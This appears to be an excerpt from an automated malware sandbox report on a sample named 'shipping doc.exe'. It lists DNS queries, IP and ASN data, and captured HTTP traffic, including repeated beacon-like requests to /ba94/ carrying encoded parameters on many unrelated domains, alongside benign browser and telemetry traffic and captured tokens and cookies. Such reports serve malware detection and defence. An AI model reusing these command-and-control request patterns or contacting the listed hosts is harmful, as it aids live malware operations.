          Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1714735103443Host: self.events.data.microsoft.comContent-Length: 7977Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=w5buqW1qnQWArBBbXdLoZIvdPItXIx3uI8MAMGH64MDDUd5zbDvuP/+Tw1xYYjeEdA0w&GBZD=NXkDk HTTP/1.1Host: www.whatpixels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?GBZD=NXkDk&pratfT=Syu+q7LTVVf/nnOGzM7dCSaK3EIFRvByY41DtIlwfuflJuMRpsP05mCao6H+1UHcp7rT HTTP/1.1Host: www.jacobmcfarland.devConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=POE3vhqdI7+x1iYSozxeyUlQEHxbL2eD4u8iGLFDDFz01TjYFTv5SGCxWy7p8kpjGI2S&GBZD=NXkDk HTTP/1.1Host: www.creditscorewizards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?GBZD=NXkDk&pratfT=9CJNXj5uQbOHs/77np+eO8Q/ISwnRwOD9dL+vmc89B+vdAeoHvCu+AGFKsv90xv/+oBs HTTP/1.1Host: www.spesandosupermercato.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=V1aFg5/hXDFl5wxQkOdKdQO0zYf9SBLxp/cCrsPO65GW9uG2gx9SN3pJ7wRbQ/9OJgNQ&GBZD=NXkDk HTTP/1.1Host: www.prismotrov.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?GBZD=NXkDk&pratfT=kXF/Fpa8v+JTS5PsBltBPJxSCgH9lcjpw4nakXkU6jr7KNfYEJ0DgTlAXzuMbnXutgFh HTTP/1.1Host: www.reddragondao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=yJmYWNcKPkPtIy8MmdQ6Jiv3GM37Mbq/xRlQ2B+NvdwqTGgi38pJAJwinC316KK/NRcT&GBZD=NXkDk HTTP/1.1Host: www.yourreicapital.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=W24/dTX+nhrci6xk5Vrz5exadXl75jzXfJ/PTNyhNxkzHtpDGR8LH25TWT7FyDO/Clqj&GBZD=NXkDk HTTP/1.1Host: www.arwile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?GBZD=NXkDk&pratfT=vEs481tzZ8uFFz1k+6tD8QeHPKaYlxkaaGxgpMrHuLeAI0f7GnjxFz6KVAN2+SMq8cuW HTTP/1.1Host: www.galaxyprofituk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&GBZD=NXkDk HTTP/1.1Host: www.naservus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=mmOyuuDxanDGJ/az8het+friGOz3k1SnavH/ohZYGmJSLkloT3wLmzxJIbhk88Ns12zj&E6Ap=B2JhxD HTTP/1.1Host: www.hjgd.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&E6Ap=B2JhxD HTTP/1.1Host: www.naservus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=mqF7ecV0fTrt7RumtuPBWgaPRte4eeCjTo6sX4dmZEZ1SPnDloKMCAAIcJIupYJjrOQM&E6Ap=B2JhxD HTTP/1.1Host: www.dxtra.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=EPgCOY9cvZq7qozCRkZFGMl16i9BJA11xMSrv9iq5fczmqSZt0yo+vxnS1dzo2vm21b4&E6Ap=B2JhxD HTTP/1.1Host: www.thesiamesebetta.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=iolsKzgpZ1NBt3juMfuMhkrDq6b7TDA/46a7L9Ma3wfGSQPZnAxkRO739civO1GZyrJ6&E6Ap=B2JhxD HTTP/1.1Host: www.sol-casino-2023.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 81.88.63.46 81.88.63.46
          Source: Joe Sandbox ViewIP Address: 91.195.240.19 91.195.240.19
          Source: Joe Sandbox ViewIP Address: 199.59.243.225 199.59.243.225
          Source: Joe Sandbox ViewIP Address: 199.59.243.225 199.59.243.225
          Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
          Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
          Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.25
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0015CE44
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGMyN07EGIjDQIIBqEDPxgJHCX_pnBgGTFIBXacAZ6kq7Pdgk5MPBVBYo5vIgBP84HnBhixFmN8IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-03-11; NID=513=WLnDOhd5dOsrExfTIhJzRGfaHO00URSXHC4egPqjg8LnTrCT9gCO6zVOSBMGLVXBjCpF9h7kR46c38yTIgUgly_c_22ExB0jC0lrxoxt0yZfs_uchdvsqNPZvpSBWIXNO1FhFBZGOykstV5zGJvfu28LzVU-qumcIzlOQgyoXsM
          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGMyN07EGIjACfJfOCNaD4TISjycM0JORvJFhG5ZwTBYCNVHc3-u05-7gGaBns57LrR4GTdhD_MIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-03-11; NID=513=nJj-S8UBL5rusEPCKRTLlqPgaIU4uNvC17_1t0-Ydx42a1bdjTYSiuzvESpni9PvJPiQepp5rg-WTAJ_F4gbdYK1NhfKY851tDnH1YbxwN1YCCCs2bZYebUVXnKFbT9OyCVmnF0Qf-0NgbqO3isVsKwS4xukaXc-Wh1b3kgw4yU
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fsZwPuD23+uHrV4&MD=xhxUnwp5 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fsZwPuD23+uHrV4&MD=xhxUnwp5 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=w5buqW1qnQWArBBbXdLoZIvdPItXIx3uI8MAMGH64MDDUd5zbDvuP/+Tw1xYYjeEdA0w&GBZD=NXkDk HTTP/1.1Host: www.whatpixels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?GBZD=NXkDk&pratfT=Syu+q7LTVVf/nnOGzM7dCSaK3EIFRvByY41DtIlwfuflJuMRpsP05mCao6H+1UHcp7rT HTTP/1.1Host: www.jacobmcfarland.devConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=POE3vhqdI7+x1iYSozxeyUlQEHxbL2eD4u8iGLFDDFz01TjYFTv5SGCxWy7p8kpjGI2S&GBZD=NXkDk HTTP/1.1Host: www.creditscorewizards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?GBZD=NXkDk&pratfT=9CJNXj5uQbOHs/77np+eO8Q/ISwnRwOD9dL+vmc89B+vdAeoHvCu+AGFKsv90xv/+oBs HTTP/1.1Host: www.spesandosupermercato.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=V1aFg5/hXDFl5wxQkOdKdQO0zYf9SBLxp/cCrsPO65GW9uG2gx9SN3pJ7wRbQ/9OJgNQ&GBZD=NXkDk HTTP/1.1Host: www.prismotrov.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?GBZD=NXkDk&pratfT=kXF/Fpa8v+JTS5PsBltBPJxSCgH9lcjpw4nakXkU6jr7KNfYEJ0DgTlAXzuMbnXutgFh HTTP/1.1Host: www.reddragondao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=yJmYWNcKPkPtIy8MmdQ6Jiv3GM37Mbq/xRlQ2B+NvdwqTGgi38pJAJwinC316KK/NRcT&GBZD=NXkDk HTTP/1.1Host: www.yourreicapital.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=W24/dTX+nhrci6xk5Vrz5exadXl75jzXfJ/PTNyhNxkzHtpDGR8LH25TWT7FyDO/Clqj&GBZD=NXkDk HTTP/1.1Host: www.arwile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?GBZD=NXkDk&pratfT=vEs481tzZ8uFFz1k+6tD8QeHPKaYlxkaaGxgpMrHuLeAI0f7GnjxFz6KVAN2+SMq8cuW HTTP/1.1Host: www.galaxyprofituk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&GBZD=NXkDk HTTP/1.1Host: www.naservus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=mmOyuuDxanDGJ/az8het+friGOz3k1SnavH/ohZYGmJSLkloT3wLmzxJIbhk88Ns12zj&E6Ap=B2JhxD HTTP/1.1Host: www.hjgd.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&E6Ap=B2JhxD HTTP/1.1Host: www.naservus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=mqF7ecV0fTrt7RumtuPBWgaPRte4eeCjTo6sX4dmZEZ1SPnDloKMCAAIcJIupYJjrOQM&E6Ap=B2JhxD HTTP/1.1Host: www.dxtra.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=EPgCOY9cvZq7qozCRkZFGMl16i9BJA11xMSrv9iq5fczmqSZt0yo+vxnS1dzo2vm21b4&E6Ap=B2JhxD HTTP/1.1Host: www.thesiamesebetta.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ba94/?pratfT=iolsKzgpZ1NBt3juMfuMhkrDq6b7TDA/46a7L9Ma3wfGSQPZnAxkRO739civO1GZyrJ6&E6Ap=B2JhxD HTTP/1.1Host: www.sol-casino-2023.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: chrome.exe, 0000000F.00000000.2228360680.00005B80007B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2498669287.00005B80007B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
          Source: chrome.exe, 0000000F.00000000.2228360680.00005B80007B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2498669287.00005B80007B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: www.whatpixels.com
          Source: global trafficDNS traffic detected: DNS query: www.jacobmcfarland.dev
          Source: global trafficDNS traffic detected: DNS query: www.creditscorewizards.com
          Source: global trafficDNS traffic detected: DNS query: www.spesandosupermercato.com
          Source: global trafficDNS traffic detected: DNS query: www.prismotrov.com
          Source: global trafficDNS traffic detected: DNS query: www.reddragondao.com
          Source: global trafficDNS traffic detected: DNS query: www.yourreicapital.com
          Source: global trafficDNS traffic detected: DNS query: www.fijula.com
          Source: global trafficDNS traffic detected: DNS query: www.arwile.com
          Source: global trafficDNS traffic detected: DNS query: www.humidityflash.site
          Source: global trafficDNS traffic detected: DNS query: www.steam.help
          Source: global trafficDNS traffic detected: DNS query: www.galaxyprofituk.com
          Source: global trafficDNS traffic detected: DNS query: www.yqwija.info
          Source: global trafficDNS traffic detected: DNS query: www.posteo.lol
          Source: global trafficDNS traffic detected: DNS query: www.naservus.com
          Source: global trafficDNS traffic detected: DNS query: www.hjgd.xyz
          Source: global trafficDNS traffic detected: DNS query: www.dxtra.shop
          Source: global trafficDNS traffic detected: DNS query: www.thesiamesebetta.biz
          Source: global trafficDNS traffic detected: DNS query: www.sol-casino-2023.club
          Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
